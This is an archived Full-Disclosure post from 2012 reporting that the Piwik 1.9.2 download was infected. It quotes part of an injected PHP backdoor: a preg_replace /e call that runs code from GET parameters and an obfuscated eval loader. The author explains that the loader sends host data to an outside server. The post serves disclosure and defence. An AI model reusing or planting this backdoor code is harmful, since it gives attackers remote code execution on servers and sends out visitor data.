lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Message-ID: <50B3CE75.9060107@grobecker-wtal.de>
Date: Mon, 26 Nov 2012 21:17:57 +0100
From: Maximilian Grobecker <max@...becker-wtal.de>
To: full-disclosure@...ts.grok.org.uk
Subject: Possible infection of Piwik 1.9.2 download archive

Hi,

this evening I downloaded a fresh archive of Piwik 1.9.2 and found this 
code at the bottom of the /piwik/core/Loader.php file:

(Just a short snippet)
-----------snip-------------
<?php Error_Reporting(0); 	if(isset($_GET['g']) && isset($_GET['s'])) {
     preg_replace("/(.+)/e", $_GET['g'], 'dwm');     exit;
   }
   if (file_exists(dirname(__FILE__)."/lic.log")) exit;
eval(gzuncompress(base64_decode('eF6Fkl9LwzAUxb+KD0I3EOmabhCkD/OhLWNOVrF/IlKatiIlnbIOZ/bpzb2pAyXRl7uF/s 
[.......]

-----------/snip-------------


I decoded some parts of this code and found what it does:
It transmits the requested Host Name (from $_SERVER['HTTP_HOST']) and 
the request URI via POST to http://prostoivse.com/x.php and creates a 
file named "lic.log" in the same directory.
As long as this file exists it seems that no further POST requests are made.

At the moment I'm trying to figure out the further sense of this code, 
but it seems that there might also be some kind of backdoor (because of 
the use of $_GET).

The file in the downloadable archive is dated at
Nov 26, 2012 / 18:42 UTC.

 From forums I know that some people downloaded the archive earlier this 
day and don't have this code inside their files.

At the moment (at 8:08 PM UTC) the archive is downloadable at the 
original Piwik web site with this obfuscated code.

I contacted the developers and managers of Piwik a few minutes ago about 
this.


-- 
Greetings from Wuppertal, Germany

Max Grobecker

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists